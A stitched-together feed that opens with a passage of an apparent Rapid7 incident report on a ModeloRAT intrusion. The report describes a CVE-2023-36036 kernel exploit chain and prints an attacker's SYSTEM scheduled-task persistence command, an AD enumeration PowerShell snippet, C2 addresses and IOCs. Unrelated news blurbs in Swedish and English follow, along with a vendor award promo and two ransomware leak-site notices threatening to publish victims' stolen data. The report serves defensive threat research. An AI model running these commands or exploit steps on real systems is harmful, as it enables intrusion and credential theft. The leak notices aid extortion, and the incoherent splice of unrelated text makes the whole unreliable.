analyzed follows the same general playbook, but adapts it for the CVE-2023-36036 vulnerability.The threat actor reused three core steps from the STAR Labs research to stabilize their exploit:Sync provider registration. The exploit registers itself as "PLURIBUS" with GUID {904EE598-0511-4664-82A8-22C4A7501044}, pointing to %TEMP%\cldflt. This causes the driver to treat the directory as a valid Cloud Files root and route file operations through the vulnerable path.WNF heap shaping. The exploit uses 4 undocumented ntdll syscalls: NtCreateWnfStateName, NtUpdateWnfStateData, NtDeleteWnfStateData, and NtQueryWnfStateData to allocate a large number of small objects in the kernel pool. This shapes memory so the overflow lands on controlled data instead of random structures. Without this step, the buffer overflow in cldflt.sys would write to unpredictable addresses and can crash the systemData-Only Token Overwrite. Instead of using process injection or shellcode, the exploit uses its own token in kernel memory by flipping a privilege bit to gain SYSTEM access. What sets testdllLPE.dll apart is what the operator added on top of that scaffolding.Kernel discovery method. It probes the kernel address range in 1 MB steps, measuring minute differences in memory access latency to identify ntoskrnl base. This avoids calling privileged APIs.Decoupled execution model. Instead of elevating the thread running the exploit, this binary spawns a helper thread that continuously polls PrivilegeCheck(SeDebugPrivilege). This allows the main exploit thread to crash, hang, or retry the kernel write multiple times without losing the payload. The moment the kernel finally flips the privilege bit, the helper thread detects the change and immediately launches internal.py as SYSTEM.Trigger path. The vulnerability is reached through the driver’s message handling path. When processing a FilterSendMessage request, cldflt.sys copies attacker-controlled data into a fixed-size buffer without proper bounds checking, overflowing into adjacent memory, specifically a function pointer.To trigger execution, the exploit creates a placeholder file within the fake sync root and writes to it.Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback.⠀When the driver intercepts the write to Link.log, it invokes the corrupted function pointer. This results in a controlled kernel write, which flips the SeDebugPrivilege bit in the helper thread's token.After the WriteFile call completes, the main exploit thread exits. The helper thread, which was polling PrivilegeCheck(SeDebugPrivilege) once per second since the exploit started, detects the change and breaks out of its loop. At this point, the privilege escalation has succeeded. The helper thread immediately launches the payload. Figure 9: Helper thread execution after privilege escalation succeeds.⠀Stage 4: Post-exploitation The newly spawned internal.py process was running under a SYSTEM token. The attacker confirmed this with whoami and immediately created a scheduled task (TempLogA) to execute internal.py daily at 13:00 with SYSTEM privileges.schtasks /create /tn TempLogA /tr "C:\Users\USER\AppData\Roaming\WPy64-31401\python\pythonw.exe internal.py" /sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /fFigure 10: Creation of SYSTEM-level scheduled task (TempLogA) for persistence.With persistence in place, the attacker moved on to Active Directory enumeration.$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry().distinguishedName $s = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://$d") $s.PageSize = 1000 $s.Filter = "(objectClass=user)" $s.FindAll().CountFigure 11: Powershell command returns the total number of domain user accounts.Shortly after, the compromised account established a remote PowerShell session (WinRM) to a second host. Once connected, additional enumeration commands were executed through the remote PowerShell process (wsmprovhost.exe), extending visibility beyond the initial system.Expanding the footholdWithin hours of privilege escalation and enumeration, 3 additional Python modules were deployed:Microsoft5237.py: HTTP beacon to 87.120.186.229 and 149.248.78.202. Captures screenshots via PowerShell, monitors user logins/logouts, uploads files to C2.Dell508.py: Reverse TCP tunnel to 207.246.114.50 and 149.28.96.170 on port 80, disguised as HTTP upgrade. C2 server instructs victim to connect to specific internal targets; victim relays traffic bidirectionally.PCDr6967.py: SOCKS5 proxy to 96.9.125.29, 144.172.111.49, and 104.194.152.246 on port 50504. Routes attacker's tools (RDP, browsers, Nmap) through victim into internal network.Stage 5: The lock screen that wasn'tRoughly two hours after privilege escalation, the attacker deployed a second DLL.rundll32.exe com6848.dll,open e8vy[REDACTED]Figure 12: Execution of com6848.dll via rundll32 to deploy credential harvesting payload.The com6848.dll (SHA-256: 30e5a6c982396cdf3157195b540f75096869baa8570f66fab88c07c161be27f0, internal name apple.dll) is a 32-bit DLL with a single export open. Its .rdata section is over 5 MB and contains an encrypted payload. The decryption key was conveniently provided on the command line by the attacker.Once decrypted, the DLL reflectively loads a second stage stage2.dll (SHA-256: f5b2dbd8ec9671c0261f093ebc5f3d35920b592458a3b800cc946265111e67d0). This DLL renders a perfect replica of the Windows 10 lock screen, using the embedded font to ensure visual accuracy even on systems where the font isn’t installed. The user sees what appears to be a normal screen lock and types their password to unlock it. The DLL captures it, and writes the result to disk as yyyy-mm-dd-Log.txtWhat the credential unlockedWait, didn't the operator already have SYSTEM privileges? Why bother with a fake lock screen?By this point, indeed the operator had SYSTEM-level access on the host. What they didn't have, though, was the user's domain credentials. SYSTEM can authenticate using the machine account, but it cannot authenticate as the user. It can't access user-specific resources, such as file shares requiring the user's permissions, mailboxes, web applications expecting user credentials, or RDP sessions that need to establish an interactive logon as that specific domain account.The same evening, the attacker used harvested credentials to authenticate via RDP to another workstation in the network. DNS logs showed connections to Dropbox and some internal systems. Additionally, they also performed Kerberoasting against service accounts, requesting vulnerable Kerberos tickets in an attempt to expand access within the environment.The following morning, the attacker returned to the second host via RDP and used Microsoft Edge to download the Comae toolkit, including DumpIt, a legitimate memory acquisition tool. Two minutes after unarchiving the Comae toolkit, the threat actor navigated within the browser to uploadnow[.]io, which offers free anonymous file upload features. During this browser session, the threat actor searched via Bing if SwissTransfer was a safe site to transfer large files, likely evaluating additional exfiltration methods. Shortly after, DumpIt.exe was executed on the second host. DumpIt captures physical RAM, including LSASS process memory, which can contain cleartext passwords, NTLM hashes, and Kerberos tickets. Based on timing and network activity, the memory dump was likely exfiltrated via uploadnow[.]io.MITRE ATT&CK techniquesTECHNIQUE IDTECHNIQUE NAMET1566.003Phishing: Spearphishing via ServiceT1204.002User Execution: Malicious FileT1059.001Command & Scripting: PowerShellT1059.006Command & Scripting: PythonT1218.011System Binary Proxy Execution: Rundll32T1106Native APIT1053.005Scheduled Task/Job: Scheduled TaskT1068Exploitation for Privilege EscalationT1134.001Access Token Manipulation: Token ImpersonationT1134.004Access Token Manipulation: Parent PID SpoofingT1562.001Impair DefensesT1027Obfuscated Files or InformationT1027.002Software PackingT1027.009Embedded PayloadsT1620Reflective Code LoadingT1036.005MasqueradingT1140Deobfuscate/Decode Files or InformationT1112Modify RegistryT1055Process InjectionT1056.002Input Capture: GUI Input CaptureT1558.003Steal or Forge Kerberos Tickets: KerberoastingT1003.001OS Credential Dumping: LSASS MemoryT1003OS Credential DumpingT1018Remote System DiscoveryT1087.002Account Discovery: Domain AccountT1082System Information DiscoveryT1016System Network Configuration DiscoveryT1033System Owner/User DiscoveryT1083File and Directory DiscoveryT1021.006Remote Services: WinRMT1021.001Remote Services: RDPT1570Lateral Tool TransferT1071.001Application Layer Protocol: Web ProtocolsT1095Non-Application Layer ProtocolT1090.001Proxy: Internal ProxyT1090.002Proxy: External ProxyT1572Protocol TunnelingT1573Encrypted ChannelT1132.001Data Encoding: Standard EncodingT1568Dynamic ResolutionT1567.002Exfiltration Over Web ServiceT1041Exfiltration Over C2 ChannelIndicators of compromise (IOCs)CategoryIndicator TypeValueAttacker InfrastructureRogue M365 Tenant (Sender)itsupport@UCICasociacion.onmicrosoft.comAttacker InfrastructureTenant GUIDcdc15b4d-6fd6-4e90-9ee9-357fea475047Attacker InfrastructureClient HostnamesRICARDOGARC05B2, KALI-LINUX-2025-2Attacker InfrastructureInitial Access VectorMS Teams external chat (Impersonating "IT Support")Network C2Pmanager.py (ModeloRAT Beacon)46.225.231.170, 144.172.99.68, 64.94.85.158, 140.82.6.45, 45.76.241.51 Network C2collector.py (Exfiltration)87.120.186.229, 149.248.78.202 (Port 80)Network C2internal.py / Microsoft5237.py87.120.186.229, 149.248.78.202 (Port 80)Network C2USOShared1297.py (TCP Shell)144.172.88.18, 64.190.113.187, 45.59.122.231 (Ports 50508, 60503)Network C2PCDr6967.py (SOCKS5)96.9.125.29, 144.172.111.49, 104.194.152.246 (Port 50504)Network C2Dell508.py (HTTP Tunnel)207.246.114.50, 149.28.96.170 (Port 80)Persistence HostCloud Files Provider NamePLURIBUSPersistence HostCloud Files Provider GUID{904EE598-0511-4664-82A8-22C4A7501044}Persistence HostRegistry Persistence KeyHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager\PLURIBUS!*Persistence HostSync Root Path%TEMP%\cldflt\Persistence HostPlaceholder File%TEMP%\cldflt\Link.logMore indicators of compromise can be found on Rapid7’s GitHub.Key findingsModeloRAT pivoted from browser extensions to Teams social engineering.Portable Python environments bypass traditional EDR signatures.CVE-2023-36036 remains effective despite patch availability.Fake lock screens can harvest credentials even with SYSTEM access.WebDAV API abuse provides stealthy credential validation.It took two days to go from "Hi, this is IT support" to domain-wide credential access using a fake lock screen, a Python based RAT, and a two-year-old kernel exploit. If you were an incident responder, none of these techniques would have been new for you, and that’s the point.What particularly stands out is how quickly control shifted from endpoint to identity. Once valid credentials were obtained, the environment itself became the attack surface.

Roony Bardghji, 20, fick inte plats i Sveriges VM-trupp. Enligt Aftonbladet berodde petningen bland annat på att Barcelona-spelaren visat missnöje kring utebliven speltid. – Det här är nyheter för mig, säger Graham Potter till SVT Sport.

SVT kan avslöja att Dante Peykar misstänks vara en del av Irans proxykrig i Sverige. 41-åringen – som nu sätts upp som ett högprioriterat mål på Europols most wanted-lista – kopplas enligt uppgift till det alias som beställde mordförsöket på Irankännaren Arvin Khoshnood.

Fotokonstnären Erik Johansson gör succé över världen med sina surrealistiska fotografier, inspirerad av Dalí och Magritte. Han bor i Tjeckien, men många av bilderna tar han i omgivningarna till föräldragården i Svenstorp utanför Götene där också hans permanenta galleri just öppnat för säsongen. – Det finns någonting magiskt i platserna där jag växte upp, säger Erik Johansson.

One seeks contractor to manage millions in taxpayer cash, will provide generous 20% off Windsor biscuit tins and tea towels

[AI generated] N/A

I årets Eurovision song contest representeras Finland av en duo: Violinisten Linda Lampenius och sångaren Pete Parkkonen som tillsammans framför låten Liekinheitin . Parkkonens karriär började med finska Idol-tävlingen och nådde nya höjder med en omtalad musikvideo som gav honom statusen som sexsymbol.

Gängtoppen Poya Shafie har beskrivits som en av de som står Foxtrot-ledaren Rawa Majids närmast. Shafie misstänks vara hjärnan bakom flera våldsdåd i Stockholm och Sundsvall. Under onsdagen började rättegången.

At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership. This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.A new era of partner-led servicesTo meet the evolving needs of the cybersecurity landscape, Rapid7 Partner Academy has introduced specialized Partner Services Certifications. These role-based learning paths are designed to move beyond traditional "product training" by focusing on high-fidelity service delivery and outcome-driven results, including how to build, deliver, and scale services on Rapid7 solutions. The training and certification program was specifically recognized for its "Partner-First" design, which was built through extensive collaboration with our global partner ecosystem to ensure alignment with real-world sales and technical challenges.Our award-winning partner services certification ecosystem focuses on three critical pillars of the Rapid7 Command Platform:Partner Services for InsightIDR: Equips partners with the skills and knowledge necessary to effectively guide customers through the post-sale phases of the InsightIDR solution.Partner Services for Exposure Command: Focuses on the transition from static vulnerability scanning to continuous attack surface validation, diving into the setup, management, and troubleshooting of Exposure Command.Partner Services for Vulnerability Management: Empowers partners to provide impactful services around deployment, management, and ongoing support for InsightVM that drive customer success.All three of these Partner Services Certifications enable our partners to deliver services around Rapid7 solutions from deployment and onboarding, to management and best practices for usage, to express health checks and troubleshooting. Upon successful completion of the course theoretical exam, you are eligible to enroll in the Services Validation Component. After validating your services capabilities, you will receive the prestigious distinction of achieving the Rapid7 Partner Services Certification and Badge. This achievement helps to differentiate your services to your customers and prospects with official recognition among the most capable Rapid7 MSSPs and service delivery partners.Real-world impact: From training to executionThe Gold Stevie Award recognizes more than just curriculum—it recognizes the impact these certifications have on the partner's ability to drive business and accelerate their profitability with Rapid7. By completing these Rapid7 Partner Academy certifications, partners gain:Operational excellence: Technical specialists learn to deploy and manage Rapid7 solutions with a "Gold Standard" approach, ensuring high-fidelity results for customers.Strategic alignment: Sales professionals are trained in the RSP (Rapid7 Sales Professional) methodology, allowing them to position Rapid7 as the preferred solution through effective discovery and objection handling.Program economics: Certified partners can take full advantage of the 2026 PACT updates, which offer enhanced incentives and streamlined deal motions for partner-led growth.Collaborating for successThe Stevie Award for Achievement in Collaboration and Partnership specifically applauds how Rapid7 integrated partner feedback into the curriculum development. This wasn't just Rapid7 talking to partners; it was a co-innovation effort. By coordinating with partners and Rapid7 technical support stakeholders, we ensured that the Partner Academy content directly addresses the "last-mile" technical blockers partners face in the field.The value and impact of Partner Academy is highlighted by the comments from the Stevie American Business Awards® judges:"I’ve seen a lot of partner programs, and most are built for the vendor, not the partner. This one stands out...A 5X outperformance, 76% completion rate, 91% satisfaction, and an NPS of 68 all point to real value delivered, not vanity metrics. I’m especially impressed by the coordination behind it –100 contributors across 13 business units. That level of alignment is hard to achieve, and it shows strong leadership. The fact that the program was mentioned on an earnings call also signals clear strategic impact.""Overall, this is an outstanding and result-oriented program, and it sets the bar high for the partner enablement process. Exceeding the certification target by 5X within a significantly shortened timeframe speaks volumes for the relevance and execution of the program, and the creation of role-based, technically sophisticated learning paths speaks volumes for the focus on partner enablement."Celebrating our partnersThis award is a shared victory with the thousands of partner individuals who have invested in their professional development through the Partner Academy. Whether you are a technical expert seeking to “Command the Attack Surface” or a sales professional looking to protect your margins, the Partner Academy is your gateway to success in the Rapid7 ecosystem.Join the award-winning program and start your learning journey today!As we continue to innovate, our goal remains the same: to provide the most transparent, consistent, and world-class enablement program in the industry. We invite all partners to officially become a Rapid7 PACT Partner to explore these award-winning certifications and start driving deeper impact for your customers today.

Article URL: https://avkcode.github.io/blog/us-winning-ai-race.html Comments URL: https://news.ycombinator.com/item?id=48121929 Points: 233 # Comments: 661

Allele Diagnostics specializes in providing exceptional microarray and cytogenetic testing serv ices, including neonatal, pediatric, and prenatal testing. The company is dedicated to deliveri ng accurate, fast, and reliable results, leveraging the extensive experience of its laboratory staff to optimize testing performance. We will upload corporate data soon. Detailed employee personal information (passports, DLs, SSN s, I9 forms, credit card details and so on), patients information (personal docs and medical in formation), contracts and agreements, etc.

Bittersweet post tells devs what they already knew: The framework is too slow

Microsoft has unveiled a new multi-model artificial intelligence (AI)-driven system called MDASH to facilitate vulnerability discovery and remediation at scale, adding that it's being tested by some customers as part of a limited private preview. MDASH, short for multi-model agentic scanning harness, is designed as a model-agnostic system that uses bespoke AI agents for different vulnerability

GCC 16.1 released at the end of April as the latest major, annual feature release to the GNU Compiler Collection. Early benchmarks showed some nice leads for GCC 16 over GCC 15. Continued testing of the new GCC 16 compiler has continued to show overall better performance of the resulting binaries than using GCC 15 on the same hardware and same compiler flags. That led many to wonder about the GCC 16 performance up against the latest LLVM/Clang open-source compiler, which is the focus of today's benchmarking showdown.

Vill du se fotbolls-VM tillsammans med andra? På flera håll i Stockholms län planeras visningar av matcherna på storbildsskärm – både i stadsmiljö och på restauranger och barer. Här är guiden till var du kan se matcherna i sommar.

May 19 launch will put redesigned rocket, pad, and engines through their paces

US Defence Secretary Pete Hegseth’s rare presence in President Donald Trump’s entourage to Beijing signals a willingness on both sides to strengthen military communications to de-escalate and avoid crises, and suggests US arms sales to Taiwan will feature in talks, analysts say. The Chinese experts expected Beijing to include Defence Minister Dong Jun in talks during the summit, with one source suggesting that Dong and Hegseth might also hold separate negotiations on the sidelines of the...

Vid Sapphire 2026 presenterade SAP det man kallar ”Autonomous Enterprise”: en omfattande vision där AI-agenter inte bara bistår medarbetarna, utan själva utför affärsprocesser. – Vi bygger inget mindre än ett nytt SAP, sa vd Christian Klein till deltagarna i Orlando, Florida. Företaget, sade han, är på väg att ”bli ett företag inom affärs-AI”. Kärnan är SAP Autonomous Suite, som använder mer än 50 domänspecifika SAP Joule AI-assistenter inom ekonomi, leveranskedja, inköp, HR och kundengagemang. Dessa assistenter samordnar en grupp på över 200 specialiserade agenter för att utföra uppgifter från början till slut, från att komprimera bokslutet till att automatisera ombalanseringen av leveranskedjan. Klein betonade att AI för företag kräver precision. – Om AI sköter löneutbetalningar, bokslut eller planering av leveranskedjan är 80 procent noggrannhet inte tillräckligt, sa han. En ny plattform och ett nytt gränssnitt Grunden för sviten är SAP:s nya Business AI Platform, som förenar SAP:s Business Technology Platform, Business Data Cloud och AI-funktioner i en enda styrd miljö. Kärnan är vad SAP kallar ”företagsminne”, en kontextgraf som förser agenterna med policyer, procedurer, Slack-konversationer och e-postgodkännandekedjor så att de vet vad de ska göra och, framför allt, vad de inte ska göra. – När det uppstår ett undantag läggs det till i företagsminnet och alla agenter anpassar sig omedelbart, sa Muhammad Alam, styrelseledamot med ansvar för produktutveckling. SAP introducerade också Joule Work, som fundamentalt förändrar hur användare interagerar med SAP-programvara. Istället för att navigera i applikationer och mata in data på olika skärmar beskriver användarna ett önskat resultat, och Joule koordinerar arbetsflöden, data och agenter för att få det gjort. För utvecklare lanserade SAP Joule Studio 2.0, som är tillgängligt gratis fram till årsskiftet, vilket låter dem bygga agenter med Python, Claude Code eller Cursor och distribuera dem till en hanterad runtime. AI Agent Hub, som lanseras under tredje kvartalet utan extra kostnad, erbjuder en enda plats för att upptäcka, hantera och styra agenter i både SAP- och icke-SAP-system. Partner och bevis SAP bjöd in viktiga partner på scenen och på skärmen för att understryka sina AI-ambitioner. I videoklipp sa Anthropics president Daniela Amodei att Claude-modeller driver Joule-agenter inom ekonomi, inköp och leveranskedjan, och Nvidias vd Jensen Huang diskuterade öppna agentprotokoll som gör det möjligt för AI att agera säkert inom företag. Jeremy Barnum, cfo på JP Morgan Chase, sa att banken uppgraderar sin huvudbok till SAP:s enhetliga plattform och utforskar agentfunktioner för kassahantering. – Man kan inte realisera AI:s fulla potential i en äldre miljö, sa han. Ett antal kunder har redan tagit systemet i drift. Enligt Rob Fisher, KPMG:s globala rådgivningschef, har företaget till exempel implementerat Joule för 270 000 användare, där 3 000 konsulter använder 20 agenter, och företaget siktar på att minska kontraktsläckaget med 120 miljoner dollar. Dessutom rapporterade Ericsson att man sparat 90 000 timmar genom att använda personanpassade AI-rekommendationer för sina 85 000 anställda. Bayer använder assistenter för kontantinkassering; Novartis har implementerat inköpsagenter för stora volymer; och H&M har demonstrerat ett butiksinformationssystem som levererar prestationsdata i realtid och AI-drivna rekommendationer till butikschefer. Tänk på avståndet Ändå släpar införandet efter ambitionerna. Maribel Lopez, grundare av Lopez Research, säger att företagen inte implementerar det som redan finns tillgängligt. – SAP-kunder är mycket försiktiga eftersom SAP-arbetsbelastningarna är centrala för driften av verksamheten, säger hon. Mickey North Rizza, chef för företagsprogramvara på analysföretaget IDC, är mer optimistisk. – För närvarande används 73 procent av AI-agenterna och -assistenterna ofta och ger besparingar på 30 till 90 minuter per dag, säger hon. – SAP:s AI-vision är en ledstjärna för deras kunder att framgångsrikt ta sig in i AI-världen. SAP:s Alam tillade att kunderna har blivit otåliga med företagets AI-löften och har ställt honom till svars. Med hänvisning till assistenten för bokslut krävde en kund: ”Finns den verkligen? Om det dröjer tre månader ska jag bygga den själv.” Det skapar en ny känsla av brådska, sade Alam. Lita på, men verifiera SAP har gjort styrning till ett centralt fokus, påpekade Alam. Företaget har byggt in SOX-revisorkompatibilitet i sitt ramverk för att säkerställa revisionsberedskap på agentnivå, och varje åtgärd loggas och är spårbar. Men Jonathan von Rüeden, SAP:s AI-chef, medgav att kunderna har olika nivåer av trygghet med autonomi, beroende på processen. – I en bokslutsprocess kommer finansdirektören att vilja ta en titt när böckerna stängs. Men folk känner sig mer trygga med autonoma periodiseringar. SAP prioriterar också interoperabilitet. Agenter som byggs i Joule Studio kommer att stödja A2A-protokollet för att ansluta till tredjepartsagenter, och SAP:s orkestreringslager kommer att styra icke-SAP-agenter utan extra kostnad. Vägen till autonomi För att påskynda införandet har SAP uppdaterat sina erbjudanden. RISE with SAP-kunder får tre Joule-assistenter aktiverade under sitt första år, medan GROW with SAP-kunder får tillgång till hela agentportföljen vid onboarding. Agentledda transformationsverktyg kan minska migreringsarbetet med cirka 35 procent, enligt SAP. – Men just nu behöver kunderna inte tusentals agenter; de behöver få agentbaserad AI igång med en uppsättning säkra, styrda agenter som hjälper dem att hantera specifika användningsfall, säger Lopez. – Kunderna måste fråga sig vad visionen är, koppla den till sina behov och sedan planera resan.

Den ökända malwaregruppen TeamPCP tycks ha publicerat källkoden till sin Shai-Hulud-mask öppet på Github, rapporterar The Register. Säkerhetsföretaget Ox upptäckte två publika kodarkiv där gruppen själva beskriver projektet som öppen källkod. Shai-Hulud är en självspridande mask som angriper NPM-paket och försöker stjäla inloggningsuppgifter till tjänster som AWS, Github, Azure och Google Cloud. Om den lyckas kan den automatiskt infektera fler projekt genom att publicera manipulerade paket vidare i utvecklarnas leveranskedjor. I vissa fall försöker skadeprogrammet även radera den lokala miljön om attacken misslyckas. Enligt Ox har andra angripare redan börjat forka och modifiera koden på GitHub för egna versioner av masken. Vid tillfället för rapporteringen hade arkiven funnits tillgängliga i tolv timmar utan att Github tagit bort dem.

The Institute of Private Enterprise Development focuses on improving the livelihoods of micro a nd small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their services are designed to support individuals looking to start or grow their businesses, with a signific ant emphasis on female and youth entrepreneurs, as well as those in rural areas. We will upload 55gb of corporate data soon. Detailed clients and employee personal information (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDAs , etc.

Flera stora Hollywoodprofiler, som George Clooney, Tom Hanks och Meryl Streep, ställer sig bakom den nya AI-standarden “Human Consent Standard”, rapporterar The Verge. Bakom initiativet står även organisationer som Creative Artists Agency samt skådespelerskan Cate Blanchett, som beskriver systemet som ett sätt för både kändisar och vanliga människor att skydda sina rättigheter i AI-eran. Standarden gör det möjligt för användare att ange om AI-företag får använda deras material fritt, endast under vissa villkor eller inte alls. Syftet är att ge människor större kontroll över hur AI-system får använda deras ansikten, röster, karaktärer och kreativa verk. Systemet bygger vidare på “Really Simple Licensing”-standarden och använder signaler via robots.txt-filer för att kommunicera reglerna till AI-botar. I juni lanseras även ett register som AI-system kan kontrollera och där både kreatörer och privatpersoner ska kunna verifiera sin identitet och ange sina AI-villkor.

Sydkoreas regering överväger en slags “folkutdelning” där delar av de enorma vinsterna från landets halvledar- och AI-industri skulle kunna omfördelas till allmänheten, rapporterar Nikkei Asia. Förslaget kommer från president Lee Jae Myungs policychef, Kim Yong-beom, som varnar för att AI-ekonomin riskerar att skapa stora klyftor. Enligt honom kommer AI- och chippföretag att samla på sig mycket stora vinster samtidigt som medelklassen och personer utan AI-kompetens riskerar att halka efter. Regeringen har ännu inte presenterat exakt hur en sådan utdelning skulle fungera i praktiken. En variant är att en del av vinsterna ska användas för satsningar som exempelvis stöd till unga entreprenörer, landsbygden, konstnärer, pensionärer och AI-utbildning. Enligt Kim Yong-beom står Sydkorea nu inför ett vägval. Att fortsätta som en traditionell exportberoende ekonomi som svänger med värdskonjukturen, eller utvecklas till en ny typ av AI-driven industristat.